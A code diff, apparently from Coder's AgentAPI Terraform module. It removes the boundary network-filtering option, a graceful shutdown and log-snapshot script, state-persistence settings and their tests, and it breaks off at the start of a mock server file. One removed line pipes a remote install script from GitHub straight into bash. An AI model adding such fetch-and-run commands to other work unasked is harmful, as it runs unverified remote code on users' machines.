-        skipAgentAPIMock: true,
-      });
-      const pidFile = "/tmp/agentapi-test.pid";
-      // HTTP 500 will cause snapshot to fail
-      await setupMocks(id, "normal", 500, pidFile);
-      const result = await runShutdownScript(id, "test-task", pidFile, "true");
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain(
-        "Log snapshot capture failed, continuing shutdown",
-      );
-      expect(result.stdout).toContain("Sending SIGTERM to AgentAPI");
-    });
-
-    test("resolves default PID path from MODULE_DIR_NAME", async () => {
-      const { id } = await setup({
-        moduleVariables: {},
-        skipAgentAPIMock: true,
-      });
-      // Start mock with PID file at the module_dir_name default location.
-      const defaultPidPath = `/home/coder/${moduleDirName}/agentapi.pid`;
-      await setupMocks(id, "normal", 204, defaultPidPath);
-      // Don't pass pidFilePath - let shutdown script compute it from MODULE_DIR_NAME.
-      const shutdownScript = await loadTestFile(
-        import.meta.dir,
-        "../scripts/agentapi-shutdown.sh",
-      );
-      const libScript = await loadTestFile(
-        import.meta.dir,
-        "../scripts/lib.sh",
-      );
-      await writeExecutable({
-        containerId: id,
-        filePath: "/tmp/agentapi-lib.sh",
-        content: libScript,
-      });
-      await writeExecutable({
-        containerId: id,
-        filePath: "/tmp/shutdown.sh",
-        content: shutdownScript,
-      });
-      const result = await execContainer(id, [
-        "bash",
-        "-c",
-        `ARG_TASK_ID=test-task ARG_AGENTAPI_PORT=3284 ARG_MODULE_DIR_NAME=${moduleDirName} ARG_ENABLE_STATE_PERSISTENCE=true CODER_AGENT_URL=http://localhost:18080 CODER_AGENT_TOKEN=test-token /tmp/shutdown.sh`,
-      ]);
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain("Sending SIGUSR1 to AgentAPI");
-      expect(result.stdout).toContain("Sending SIGTERM to AgentAPI");
-    });
-
-    test("skips SIGUSR1 when no PID file available", async () => {
-      const { id } = await setup({
-        moduleVariables: {},
-        skipAgentAPIMock: true,
-      });
-      await setupMocks(id, "normal", 204);
-      // No pidFilePath and no MODULE_DIR_NAME, so no PID file can be resolved.
-      const result = await runShutdownScript(id, "test-task", "", "false");
-
-      expect(result.exitCode).toBe(0);
-      // Should not send SIGUSR1 or SIGTERM (no PID to signal).
-      expect(result.stdout).not.toContain("Sending SIGUSR1");
-      expect(result.stdout).not.toContain("Sending SIGTERM");
-      expect(result.stdout).toContain("Shutdown complete");
-    });
-
-    test("skips SIGUSR1 when state persistence disabled", async () => {
-      const { id } = await setup({
-        moduleVariables: {},
-        skipAgentAPIMock: true,
-      });
-      const pidFile = "/tmp/agentapi-test.pid";
-      await setupMocks(id, "normal", 204, pidFile);
-      // PID file exists but state persistence is disabled.
-      const result = await runShutdownScript(id, "test-task", pidFile, "false");
-
-      expect(result.exitCode).toBe(0);
-      // Should NOT send SIGUSR1 (persistence disabled).
-      expect(result.stdout).not.toContain("Sending SIGUSR1");
-      // Should still send SIGTERM (graceful shutdown always happens).
-      expect(result.stdout).toContain("Sending SIGTERM to AgentAPI");
-    });
-  });
-
-  describe("boundary", async () => {
-    test("boundary-disabled-by-default", async () => {
-      const { id } = await setup();
-      await execModuleScript(id);
-      await expectAgentAPIStarted(id);
-      // Config file should NOT exist when boundary is disabled
-      const configCheck = await execContainer(id, [
-        "bash",
-        "-c",
-        "test -f /home/coder/.config/coder_boundary/config.yaml && echo exists || echo missing",
-      ]);
-      expect(configCheck.stdout.trim()).toBe("missing");
-      // AGENTAPI_BOUNDARY_PREFIX should NOT be in the mock log
-      const mockLog = await readFileContainer(
-        id,
-        "/home/coder/agentapi-mock.log",
-      );
-      expect(mockLog).not.toContain("AGENTAPI_BOUNDARY_PREFIX:");
-    });
-
-    test("boundary-enabled", async () => {
-      const { id } = await setup({
-        moduleVariables: {
-          enable_boundary: "true",
-          boundary_config_path: "/tmp/test-boundary.yaml",
-        },
-      });
-      // Write boundary config to the path before running the module
-      await execContainer(id, [
-        "bash",
-        "-c",
-        `cat > /tmp/test-boundary.yaml <<'EOF'
-jail_type: landjail
-proxy_port: 8087
-log_level: warn
-allowlist:
-  - "domain=api.example.com"
-EOF`,
-      ]);
-      // Add mock coder binary for boundary setup
-      await writeExecutable({
-        containerId: id,
-        filePath: "/usr/bin/coder",
-        content: `#!/bin/bash
-if [ "$1" = "boundary" ]; then
- shift; shift; exec "$@"
-fi
-echo "mock coder"`,
-      });
-      await execModuleScript(id);
-      await expectAgentAPIStarted(id);
-      // Verify the config file exists at the specified path
-      const config = await readFileContainer(id, "/tmp/test-boundary.yaml");
-      expect(config).toContain("jail_type: landjail");
-      expect(config).toContain("proxy_port: 8087");
-      expect(config).toContain("domain=api.example.com");
-      // AGENTAPI_BOUNDARY_PREFIX should be exported
-      const mockLog = await readFileContainer(
-        id,
-        "/home/coder/agentapi-mock.log",
-      );
-      expect(mockLog).toContain("AGENTAPI_BOUNDARY_PREFIX:");
-      // E2E: start script should have used the wrapper
-      const startLog = await readFileContainer(
-        id,
-        "/home/coder/test-agentapi-start.log",
-      );
-      expect(startLog).toContain("Starting with boundary:");
-    });
-
-    test("boundary-enabled-no-coder-binary", async () => {
-      const { id } = await setup({
-        moduleVariables: {
-          enable_boundary: "true",
-          boundary_config_path: "/tmp/test-boundary.yaml",
-        },
-      });
-      // Write boundary config
-      await execContainer(id, [
-        "bash",
-        "-c",
-        `cat > /tmp/test-boundary.yaml <<'EOF'
-jail_type: landjail
-proxy_port: 8087
-log_level: warn
-EOF`,
-      ]);
-      // Remove coder binary to simulate it not being available
-      await execContainer(
-        id,
-        [
-          "bash",
-          "-c",
-          "rm -f /usr/bin/coder /usr/local/bin/coder 2>/dev/null; hash -r",
-        ],
-        ["--user", "root"],
-      );
-      const resp = await execModuleScript(id);
-      // Script should fail because coder binary is required
-      expect(resp.exitCode).not.toBe(0);
-      const scriptLog = await readFileContainer(id, "/home/coder/script.log");
-      expect(scriptLog).toContain("Boundary cannot be enabled");
-    });
-  });
 });
@@ -4,7 +4,7 @@ terraform {
  required_providers {
    coder = {
      source  = "coder/coder"
-      version = ">= 2.13"
+      version = ">= 2.12"
    }
  }
 }
@@ -18,8 +18,6 @@ data "coder_workspace" "me" {}

 data "coder_workspace_owner" "me" {}

-data "coder_task" "me" {}
-
 variable "web_app_order" {
  type        = number
  description = "The order determines the position of app in the UI presentation. The lowest order is shown first and apps with equal order are sorted by name (ascending order)."
@@ -53,12 +51,6 @@ variable "folder" {
  default     = "/home/coder"
 }

-variable "web_app" {
-  type        = bool
-  description = "Whether to create the web workspace app. This is automatically enabled when using Coder Tasks, regardless of this setting."
-  default     = true
-}
-
 variable "cli_app" {
  type        = bool
  description = "Whether to create the CLI workspace app."
@@ -134,12 +126,6 @@ variable "agentapi_port" {
  default     = 3284
 }

-variable "task_log_snapshot" {
-  type        = bool
-  description = "Capture last 10 messages when workspace stops for offline viewing while task is paused."
-  default     = true
-}
-
 locals {
  # agentapi_subdomain_false_min_version_expr matches a semantic version >= v0.3.3.
  # Initial support was added in v0.3.1 but configuration via environment variable
@@ -170,67 +156,8 @@ variable "module_dir_name" {
  description = "Name of the subdirectory in the home directory for module files."
 }

-variable "enable_boundary" {
-  type        = bool
-  description = "Enable coder boundary for network filtering. Requires boundary_config to be set."
-  default     = false
-}
-
-variable "boundary_config_path" {
-  type        = string
-  description = "Path to boundary config.yaml inside the workspace. If provided, exposed as BOUNDARY_CONFIG env var."
-  default     = ""
-}
-
-variable "boundary_version" {
-  type        = string
-  description = "Boundary version. When use_boundary_directly is true, a release version should be provided or 'latest' for the latest release. When compile_boundary_from_source is true, a valid git reference should be provided (tag, commit, branch)."
-  default     = "latest"
-}
-
-variable "compile_boundary_from_source" {
-  type        = bool
-  description = "Whether to compile boundary from source instead of using the official install script."
-  default     = false
-}
-
-variable "use_boundary_directly" {
-  type        = bool
-  description = "Whether to use boundary binary directly instead of coder boundary subcommand. When false (default), uses coder boundary subcommand. When true, installs and uses boundary binary from release."
-  default     = false
-}
-
-variable "enable_state_persistence" {
-  type        = bool
-  description = "Enable AgentAPI conversation state persistence across restarts."
-  default     = false
-}
-
-variable "state_file_path" {
-  type        = string
-  description = "Path to the AgentAPI state file. Defaults to $HOME/<module_dir_name>/agentapi-state.json."
-  default     = ""
-}
-
-variable "pid_file_path" {
-  type        = string
-  description = "Path to the AgentAPI PID file. Defaults to $HOME/<module_dir_name>/agentapi.pid."
-  default     = ""
-}
-
-resource "coder_env" "boundary_config" {
-  count    = var.enable_boundary && var.boundary_config_path != "" ? 1 : 0
-  agent_id = var.agent_id
-  name     = "BOUNDARY_CONFIG"
-  value    = var.boundary_config_path
-}

 locals {
-  # If this is a Task, always create the web app regardless of var.web_app
-  # since coder_ai_task requires the app to function.
-  is_task = try(data.coder_task.me.enabled, false)
-  web_app = var.web_app || local.is_task
-
  # we always trim the slash for consistency
  workdir                            = trimsuffix(var.folder, "/")
  encoded_pre_install_script         = var.pre_install_script != null ? base64encode(var.pre_install_script) : ""
@@ -246,9 +173,6 @@ locals {
  //     for backward compatibility.
  agentapi_chat_base_path = var.agentapi_subdomain ? "" : "/@${data.coder_workspace_owner.me.name}/${data.coder_workspace.me.name}.${var.agent_id}/apps/${var.web_app_slug}/chat"
  main_script             = file("${path.module}/scripts/main.sh")
-  shutdown_script         = file("${path.module}/scripts/agentapi-shutdown.sh")
-  lib_script              = file("${path.module}/scripts/lib.sh")
-  boundary_script         = file("${path.module}/scripts/boundary.sh")
 }

 resource "coder_script" "agentapi" {
@@ -262,10 +186,6 @@ resource "coder_script" "agentapi" {

    echo -n '${base64encode(local.main_script)}' | base64 -d > /tmp/main.sh
    chmod +x /tmp/main.sh
-    echo -n '${base64encode(local.lib_script)}' | base64 -d > /tmp/agentapi-lib.sh
-    
-    echo -n '${base64encode(local.boundary_script)}' | base64 -d > /tmp/agentapi-boundary.sh
-    chmod +x /tmp/agentapi-boundary.sh

    ARG_MODULE_DIR_NAME='${var.module_dir_name}' \
    ARG_WORKDIR="$(echo -n '${base64encode(local.workdir)}' | base64 -d)" \
@@ -278,46 +198,12 @@ resource "coder_script" "agentapi" {
    ARG_POST_INSTALL_SCRIPT="$(echo -n '${local.encoded_post_install_script}' | base64 -d)" \
    ARG_AGENTAPI_PORT='${var.agentapi_port}' \
    ARG_AGENTAPI_CHAT_BASE_PATH='${local.agentapi_chat_base_path}' \
-    ARG_TASK_ID='${try(data.coder_task.me.id, "")}' \
-    ARG_TASK_LOG_SNAPSHOT='${var.task_log_snapshot}' \
-    ARG_ENABLE_BOUNDARY='${var.enable_boundary}' \
-    ARG_BOUNDARY_VERSION='${var.boundary_version}' \
-    ARG_COMPILE_BOUNDARY_FROM_SOURCE='${var.compile_boundary_from_source}' \
-    ARG_USE_BOUNDARY_DIRECTLY='${var.use_boundary_directly}' \
-    ARG_ENABLE_STATE_PERSISTENCE='${var.enable_state_persistence}' \
-    ARG_STATE_FILE_PATH='${var.state_file_path}' \
-    ARG_PID_FILE_PATH='${var.pid_file_path}' \
    /tmp/main.sh
    EOT
  run_on_start = true
 }

-resource "coder_script" "agentapi_shutdown" {
-  agent_id     = var.agent_id
-  display_name = "AgentAPI Shutdown"
-  icon         = var.web_app_icon
-  run_on_stop  = true
-  script       = <<-EOT
-    #!/bin/bash
-    set -o pipefail
-
-    echo -n '${base64encode(local.shutdown_script)}' | base64 -d > /tmp/agentapi-shutdown.sh
-    chmod +x /tmp/agentapi-shutdown.sh
-    echo -n '${base64encode(local.lib_script)}' | base64 -d > /tmp/agentapi-lib.sh
-
-    ARG_TASK_ID='${try(data.coder_task.me.id, "")}' \
-    ARG_TASK_LOG_SNAPSHOT='${var.task_log_snapshot}' \
-    ARG_AGENTAPI_PORT='${var.agentapi_port}' \
-    ARG_ENABLE_STATE_PERSISTENCE='${var.enable_state_persistence}' \
-    ARG_MODULE_DIR_NAME='${var.module_dir_name}' \
-    ARG_PID_FILE_PATH='${var.pid_file_path}' \
-    /tmp/agentapi-shutdown.sh
-    EOT
-}
-
 resource "coder_app" "agentapi_web" {
-  count = local.web_app ? 1 : 0
-
  slug         = var.web_app_slug
  display_name = var.web_app_display_name
  agent_id     = var.agent_id
@@ -354,5 +240,5 @@ resource "coder_app" "agentapi_cli" {
 }

 output "task_app_id" {
-  value = local.web_app ? coder_app.agentapi_web[0].id : ""
+  value = coder_app.agentapi_web.id
 }
@@ -1,261 +0,0 @@
-#!/usr/bin/env bash
-# AgentAPI shutdown script.
-#
-# Performs a graceful shutdown of AgentAPI: sends SIGUSR1 to trigger state save,
-# captures the last 10 messages as a log snapshot posted to the Coder instance,
-# then sends SIGTERM for graceful termination.
-
-set -euo pipefail
-
-# Configuration (set via Terraform interpolation).
-readonly TASK_ID="${ARG_TASK_ID:-}"
-readonly TASK_LOG_SNAPSHOT="${ARG_TASK_LOG_SNAPSHOT:-true}"
-readonly AGENTAPI_PORT="${ARG_AGENTAPI_PORT:-3284}"
-readonly ENABLE_STATE_PERSISTENCE="${ARG_ENABLE_STATE_PERSISTENCE:-false}"
-readonly MODULE_DIR_NAME="${ARG_MODULE_DIR_NAME:-}"
-readonly PID_FILE_PATH="${ARG_PID_FILE_PATH:-${MODULE_DIR_NAME:+$HOME/$MODULE_DIR_NAME/agentapi.pid}}"
-
-# Source shared utilities (written by the coder_script wrapper).
-# shellcheck source=lib.sh
-source /tmp/agentapi-lib.sh
-
-# Runtime environment variables.
-readonly CODER_AGENT_URL="${CODER_AGENT_URL:-}"
-readonly CODER_AGENT_TOKEN="${CODER_AGENT_TOKEN:-}"
-
-# Constants.
-readonly MAX_PAYLOAD_SIZE=65536    # 64KB
-readonly MAX_MESSAGE_CONTENT=57344 # 56KB
-readonly MAX_MESSAGES=10
-readonly FETCH_TIMEOUT=10
-readonly POST_TIMEOUT=10
-
-log() {
-  echo "$*"
-}
-
-error() {
-  echo "Error: $*" >&2
-}
-
-fetch_and_build_messages_payload() {
-  local payload_file="$1"
-  local messages_url="http://localhost:${AGENTAPI_PORT}/messages"
-
-  log "Fetching messages from AgentAPI on port $AGENTAPI_PORT"
-
-  if ! curl -fsSL --max-time "$FETCH_TIMEOUT" "$messages_url" > "$payload_file"; then
-    error "Failed to fetch messages from AgentAPI (may not be running)"
-    return 1
-  fi
-
-  # Update messages field to keep only last N messages.
-  if ! jq --argjson n "$MAX_MESSAGES" '.messages |= .[-$n:]' < "$payload_file" > "${payload_file}.tmp"; then
-    error "Failed to select last $MAX_MESSAGES messages"
-    return 1
-  fi
-  mv "${payload_file}.tmp" "$payload_file"
-
-  return 0
-}
-
-truncate_messages_payload_to_size() {
-  local payload_file="$1"
-  local max_size="$2"
-
-  while true; do
-    local size
-    size=$(wc -c < "$payload_file")
-
-    if ((size <= max_size)); then
-      break
-    fi
-
-    local count
-    count=$(jq '.messages | length' < "$payload_file")
-
-    if ((count == 1)); then
-      # Down to last message, truncate its content keeping the tail.
-      log "Payload size $size bytes exceeds limit, truncating final message content"
-
-      # Keep tail of content with truncation indicator, leaving room for JSON
-      # overhead.
-      if ! jq --argjson maxlen "$MAX_MESSAGE_CONTENT" '.messages[0].content |= (if length > $maxlen then "[...content truncated, showing last 56KB...]\n\n" + .[-$maxlen:] else . end)' < "$payload_file" > "${payload_file}.tmp"; then
-        error "Failed to truncate message content"
-        return 1
-      fi
-      mv "${payload_file}.tmp" "$payload_file"
-
-      # Verify the truncation was sufficient.
-      size=$(wc -c < "$payload_file")
-      if ((size > max_size)); then
-        error "Payload still too large after content truncation, giving up"
-        return 1
-      fi
-      break
-    else
-      # More than one message, remove the oldest.
-      log "Payload size $size bytes exceeds limit, removing oldest message"
-
-      if ! jq '.messages |= .[1:]' < "$payload_file" > "${payload_file}.tmp"; then
-        error "Failed to remove oldest message"
-        return 1
-      fi
-      mv "${payload_file}.tmp" "$payload_file"
-    fi
-  done
-
-  return 0
-}
-
-post_task_log_snapshot() {
-  local payload_file="$1"
-  local tmpdir="$2"
-
-  local snapshot_url="${CODER_AGENT_URL}/api/v2/workspaceagents/me/tasks/${TASK_ID}/log-snapshot?format=agentapi"
-  local response_file="${tmpdir}/response.txt"
-
-  log "Posting log snapshot to Coder instance"
-
-  local http_code
-  if ! http_code=$(curl -sS -w "%{http_code}" -o "$response_file" \
-    --max-time "$POST_TIMEOUT" \
-    -X POST "$snapshot_url" \
-    -H "Coder-Session-Token: $CODER_AGENT_TOKEN" \
-    -H "Content-Type: application/json" \
-    --data-binary "@$payload_file"); then
-    error "Failed to connect to Coder instance (curl failed)"
-    return 1
-  fi
-
-  if [[ $http_code == 204 ]]; then
-    log "Log snapshot posted successfully"
-    return 0
-  elif [[ $http_code == 404 ]]; then
-    log "Log snapshot endpoint not supported by this Coder version, skipping"
-    return 0
-  else
-    local response
-    response=$(cat "$response_file" 2> /dev/null || echo "")
-    error "Failed to post log snapshot (HTTP $http_code): $response"
-    return 1
-  fi
-}
-
-capture_task_log_snapshot() {
-  if [[ -z $TASK_ID ]]; then
-    log "No task ID, skipping log snapshot"
-    return 0
-  fi
-
-  if [[ -z $CODER_AGENT_URL ]]; then
-    error "CODER_AGENT_URL not set, cannot capture log snapshot"
-    return 1
-  fi
-
-  if [[ -z $CODER_AGENT_TOKEN ]]; then
-    error "CODER_AGENT_TOKEN not set, cannot capture log snapshot"
-    return 1
-  fi
-
-  if ! command -v jq > /dev/null 2>&1; then
-    error "jq not found, cannot capture log snapshot"
-    return 1
-  fi
-
-  if ! command -v curl > /dev/null 2>&1; then
-    error "curl not found, cannot capture log snapshot"
-    return 1
-  fi
-
-  # Not local, must be visible to the EXIT trap after the function returns.
-  tmpdir=$(mktemp -d)
-  trap 'trap - EXIT; rm -rf "$tmpdir"' EXIT
-
-  local payload_file="${tmpdir}/payload.json"
-
-  if ! fetch_and_build_messages_payload "$payload_file"; then
-    error "Cannot capture log snapshot without messages"
-    return 1
-  fi
-
-  local message_count
-  message_count=$(jq '.messages | length' < "$payload_file")
-  if ((message_count == 0)); then
-    log "No messages for log snapshot"
-    return 0
-  fi
-
-  log "Retrieved $message_count messages for log snapshot"
-
-  # Ensure payload fits within size limit.
-  if ! truncate_messages_payload_to_size "$payload_file" "$MAX_PAYLOAD_SIZE"; then
-    error "Failed to truncate payload to size limit"
-    return 1
-  fi
-
-  local final_size final_count
-  final_size=$(wc -c < "$payload_file")
-  final_count=$(jq '.messages | length' < "$payload_file")
-  log "Log snapshot payload: $final_size bytes, $final_count messages"
-
-  if ! post_task_log_snapshot "$payload_file" "$tmpdir"; then
-    error "Log snapshot capture failed"
-    return 1
-  fi
-}
-
-main() {
-  log "Shutting down AgentAPI"
-
-  local agentapi_pid=
-  if [[ -n $PID_FILE_PATH ]]; then
-    agentapi_pid=$(cat "$PID_FILE_PATH" 2> /dev/null || echo "")
-  fi
-
-  # State persistence is only enabled when the binary supports it (>= v0.12.0).
-  # The default SIGUSR1 disposition on Linux is terminate, so sending it to an
-  # older binary would kill the process.
-  local state_persistence=0
-  if [[ $ENABLE_STATE_PERSISTENCE == true ]] && version_at_least 0.12.0 "$(agentapi_version)"; then
-    state_persistence=1
-  fi
-
-  # Trigger state save via SIGUSR1 (saves without exiting).
-  if ((state_persistence)) && [[ -n $agentapi_pid ]] && kill -0 "$agentapi_pid" 2> /dev/null; then
-    log "Sending SIGUSR1 to AgentAPI (pid $agentapi_pid) to save state"
-    kill -USR1 "$agentapi_pid" || true
-    # Allow time for state save to complete before proceeding.
-    sleep 1
-  fi
-
-  # Capture log snapshot for task history.
-  if [[ $TASK_LOG_SNAPSHOT == true ]]; then
-    # Subshell scopes the EXIT trap (tmpdir cleanup) inside
-    # capture_task_log_snapshot and preserves set -e, which
-    # || would otherwise disable for the function body.
-    (capture_task_log_snapshot) || log "Log snapshot capture failed, continuing shutdown"
-  else
-    log "Log snapshot disabled, skipping"
-  fi
-
-  # Graceful termination.
-  if [[ -n $agentapi_pid ]] && kill -0 "$agentapi_pid" 2> /dev/null; then
-    log "Sending SIGTERM to AgentAPI (pid $agentapi_pid)"
-    kill -TERM "$agentapi_pid" 2> /dev/null || true
-
-    # Wait for process to exit to guarantee a clean shutdown.
-    local elapsed=0
-    while kill -0 "$agentapi_pid" 2> /dev/null; do
-      sleep 1
-      ((elapsed++)) || true
-      if ((elapsed % 5 == 0)); then
-        log "Warning: AgentAPI (pid $agentapi_pid) still running after ${elapsed}s"
-      fi
-    done
-  fi
-
-  log "Shutdown complete"
-}
-
-main "$@"
@@ -3,22 +3,20 @@ set -o errexit
 set -o pipefail

 port=${1:-3284}
-max_attempts=150

-# This script waits for the agentapi server to start on the given port.
-# Each attempt sleeps 0.1s, so 150 attempts ≈ 15 seconds.
+# This script waits for the agentapi server to start on port 3284.
 # It considers the server started after 3 consecutive successful responses.

 agentapi_started=false

 echo "Waiting for agentapi server to start on port $port..."
-for i in $(seq 1 "$max_attempts"); do
+for i in $(seq 1 150); do
  for j in $(seq 1 3); do
    sleep 0.1
    if curl -fs -o /dev/null "http://localhost:$port/status"; then
      echo "agentapi response received ($j/3)"
    else
-      echo "agentapi server not responding ($i/$max_attempts)"
+      echo "agentapi server not responding ($i/15)"
      continue 2
    fi
  done
@@ -27,7 +25,7 @@ for i in $(seq 1 "$max_attempts"); do
 done

 if [ "$agentapi_started" != "true" ]; then
-  echo "Error: agentapi server did not start on port $port after $max_attempts attempts."
+  echo "Error: agentapi server did not start on port $port after 15 seconds."
  exit 1
 fi

@@ -1,95 +0,0 @@
-#!/bin/bash
-# boundary.sh - Boundary installation and setup for agentapi module.
-# Sourced by main.sh when ENABLE_BOUNDARY=true.
-# Exports AGENTAPI_BOUNDARY_PREFIX for use by module start scripts.
-
-validate_boundary_subcommand() {
-  if command_exists coder; then
-    if coder boundary --help > /dev/null 2>&1; then
-      return 0
-    else
-      echo "Error: 'coder' command found but does not support 'boundary' subcommand. Please enable install_boundary."
-      exit 1
-    fi
-  else
-    echo "Error: ENABLE_BOUNDARY=true, but 'coder' command not found. Boundary cannot be enabled." >&2
-    exit 1
-  fi
-}
-
-# Install boundary binary if needed.
-# Uses one of three strategies:
-#   1. Compile from source (compile_boundary_from_source=true)
-#   2. Install from release (use_boundary_directly=true)
-#   3. Use coder boundary subcommand (default, no installation needed)
-install_boundary() {
-  if [ "${COMPILE_BOUNDARY_FROM_SOURCE}" = "true" ]; then
-    echo "Compiling boundary from source (version: ${BOUNDARY_VERSION})"
-
-    # Remove existing boundary directory to allow re-running safely
-    if [ -d boundary ]; then
-      rm -rf boundary
-    fi
-
-    echo "Cloning boundary repository"
-    git clone https://github.com/coder/boundary.git
-    cd boundary || exit 1
-    git checkout "${BOUNDARY_VERSION}"
-
-    make build
-
-    sudo cp boundary /usr/local/bin/
-    sudo chmod +x /usr/local/bin/boundary
-    cd - || exit 1
-  elif [ "${USE_BOUNDARY_DIRECTLY}" = "true" ]; then
-    echo "Installing boundary using official install script (version: ${BOUNDARY_VERSION})"
-    curl -fsSL https://raw.githubusercontent.com/coder/boundary/main/install.sh | bash -s -- --version "${BOUNDARY_VERSION}"
-  else
-    validate_boundary_subcommand
-    echo "Using coder boundary subcommand (provided by Coder)"
-  fi
-}
-
-# Set up boundary: install, write config, create wrapper script.
-# Exports AGENTAPI_BOUNDARY_PREFIX pointing to the wrapper script.
-setup_boundary() {
-  local module_path="$1"
-
-  echo "Setting up coder boundary..."
-
-  # Install boundary binary if needed
-  install_boundary
-
-  # Determine which boundary command to use and create wrapper script
-  BOUNDARY_WRAPPER_SCRIPT="$module_path/boundary-wrapper.sh"
-
-  if [ "${COMPILE_BOUNDARY_FROM_SOURCE}" = "true" ] || [ "${USE_BOUNDARY_DIRECTLY}" = "true" ]; then
-    # Use boundary binary directly (from compilation or release installation)
-    cat > "${BOUNDARY_WRAPPER_SCRIPT}" << 'WRAPPER_EOF'
-#!/usr/bin/env bash
-set -euo pipefail
-exec boundary -- "$@"
-WRAPPER_EOF
-  else
-    # Use coder boundary subcommand (default)
-    # Copy coder binary to strip CAP_NET_ADMIN capabilities.
-    # This is necessary because boundary doesn't work with privileged binaries
-    # (you can't launch privileged binaries inside network namespaces unless
-    # you have sys_admin).
-    CODER_NO_CAPS="$module_path/coder-no-caps"
-    if ! cp "$(which coder)" "$CODER_NO_CAPS"; then
-      echo "Error: Failed to copy coder binary to ${CODER_NO_CAPS}. Boundary cannot be enabled." >&2
-      exit 1
-    fi
-    cat > "${BOUNDARY_WRAPPER_SCRIPT}" << 'WRAPPER_EOF'
-#!/usr/bin/env bash
-set -euo pipefail
-SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
-exec "${SCRIPT_DIR}/coder-no-caps" boundary -- "$@"
-WRAPPER_EOF
-  fi
-
-  chmod +x "${BOUNDARY_WRAPPER_SCRIPT}"
-  export AGENTAPI_BOUNDARY_PREFIX="${BOUNDARY_WRAPPER_SCRIPT}"
-  echo "Boundary wrapper configured: ${AGENTAPI_BOUNDARY_PREFIX}"
-}
@@ -1,45 +0,0 @@
-#!/usr/bin/env bash
-# Shared utility functions for agentapi module scripts.
-
-# version_at_least checks if an actual version meets a minimum requirement.
-# Non-semver strings (e.g. "latest", custom builds) always pass.
-# Usage: version_at_least <minimum> <actual>
-#   version_at_least v0.12.0 v0.10.0  # returns 1 (false)
-#   version_at_least v0.12.0 v0.12.0  # returns 0 (true)
-#   version_at_least v0.12.0 latest   # returns 0 (true)
-version_at_least() {
-  local min="${1#v}"
-  local actual="${2#v}"
-
-  # Non-semver versions pass through (e.g. "latest", custom builds).
-  if ! [[ $actual =~ ^([0-9]+)\.([0-9]+)\.([0-9]+)$ ]]; then
-    return 0
-  fi
-
-  local act_major="${BASH_REMATCH[1]}"
-  local act_minor="${BASH_REMATCH[2]}"
-  local act_patch="${BASH_REMATCH[3]}"
-
-  [[ $min =~ ^([0-9]+)\.([0-9]+)\.([0-9]+)$ ]] || return 0
-
-  local min_major="${BASH_REMATCH[1]}"
-  local min_minor="${BASH_REMATCH[2]}"
-  local min_patch="${BASH_REMATCH[3]}"
-
-  # Arithmetic expressions set exit status: 0 (true) if non-zero, 1 (false) if zero.
-  if ((act_major != min_major)); then
-    ((act_major > min_major))
-    return
-  fi
-  if ((act_minor != min_minor)); then
-    ((act_minor > min_minor))
-    return
-  fi
-  ((act_patch >= min_patch))
-}
-
-# agentapi_version returns the installed agentapi binary version (e.g. "0.11.8").
-# Returns empty string if the binary is missing or doesn't support --version.
-agentapi_version() {
-  agentapi --version 2> /dev/null | awk '{print $NF}'
-}
@@ -14,20 +14,8 @@ WAIT_FOR_START_SCRIPT="$ARG_WAIT_FOR_START_SCRIPT"
 POST_INSTALL_SCRIPT="$ARG_POST_INSTALL_SCRIPT"
 AGENTAPI_PORT="$ARG_AGENTAPI_PORT"
 AGENTAPI_CHAT_BASE_PATH="${ARG_AGENTAPI_CHAT_BASE_PATH:-}"
-TASK_ID="${ARG_TASK_ID:-}"
-TASK_LOG_SNAPSHOT="${ARG_TASK_LOG_SNAPSHOT:-true}"
-ENABLE_BOUNDARY="${ARG_ENABLE_BOUNDARY:-false}"
-BOUNDARY_VERSION="${ARG_BOUNDARY_VERSION:-latest}"
-COMPILE_BOUNDARY_FROM_SOURCE="${ARG_COMPILE_BOUNDARY_FROM_SOURCE:-false}"
-USE_BOUNDARY_DIRECTLY="${ARG_USE_BOUNDARY_DIRECTLY:-false}"
-ENABLE_STATE_PERSISTENCE="${ARG_ENABLE_STATE_PERSISTENCE:-false}"
-STATE_FILE_PATH="${ARG_STATE_FILE_PATH:-}"
-PID_FILE_PATH="${ARG_PID_FILE_PATH:-}"
 set +o nounset

-# shellcheck source=lib.sh
-source /tmp/agentapi-lib.sh
-
 command_exists() {
  command -v "$1" > /dev/null 2>&1
 }
@@ -35,13 +23,6 @@ command_exists() {
 module_path="$HOME/${MODULE_DIR_NAME}"
 mkdir -p "$module_path/scripts"

-# Check for jq dependency if task log snapshot is enabled.
-if [[ $TASK_LOG_SNAPSHOT == true ]] && [[ -n $TASK_ID ]]; then
-  if ! command_exists jq; then
-    echo "Warning: jq is not installed. Task log snapshot requires jq to capture conversation history."
-    echo "Install jq to enable log snapshot functionality when the workspace stops."
-  fi
-fi
 if [ ! -d "${WORKDIR}" ]; then
  echo "Warning: The specified folder '${WORKDIR}' does not exist."
  echo "Creating the folder..."
@@ -113,30 +94,8 @@ export LC_ALL=en_US.UTF-8

 cd "${WORKDIR}"

-# Set up boundary if enabled
-export AGENTAPI_BOUNDARY_PREFIX=""
-if [ "${ENABLE_BOUNDARY}" = "true" ]; then
-  # shellcheck source=boundary.sh
-  source /tmp/agentapi-boundary.sh
-  setup_boundary "$module_path"
-fi
-
 export AGENTAPI_CHAT_BASE_PATH="${AGENTAPI_CHAT_BASE_PATH:-}"
 # Disable host header check since AgentAPI is proxied by Coder (which does its own validation)
 export AGENTAPI_ALLOWED_HOSTS="*"
-
-export AGENTAPI_PID_FILE="${PID_FILE_PATH:-$module_path/agentapi.pid}"
-# Only set state env vars when persistence is enabled and the binary supports
-# it. State persistence requires agentapi >= v0.12.0.
-if [ "${ENABLE_STATE_PERSISTENCE}" = "true" ]; then
-  actual_version=$(agentapi_version)
-  if version_at_least 0.12.0 "$actual_version"; then
-    export AGENTAPI_STATE_FILE="${STATE_FILE_PATH:-$module_path/agentapi-state.json}"
-    export AGENTAPI_SAVE_STATE="true"
-    export AGENTAPI_LOAD_STATE="true"
-  else
-    echo "Warning: State persistence requires agentapi >= v0.12.0 (current: ${actual_version:-unknown}), skipping."
-  fi
-fi
 nohup "$module_path/scripts/agentapi-start.sh" true "${AGENTAPI_PORT}" &> "$module_path/agentapi-start.log" &
 "$module_path/scripts/agentapi-wait-for-start.sh" "${AGENTAPI_PORT}"
@@ -1,102 +0,0 @@
-#!/usr/bin/env node
-// Mock AgentAPI server for shutdown script tests.
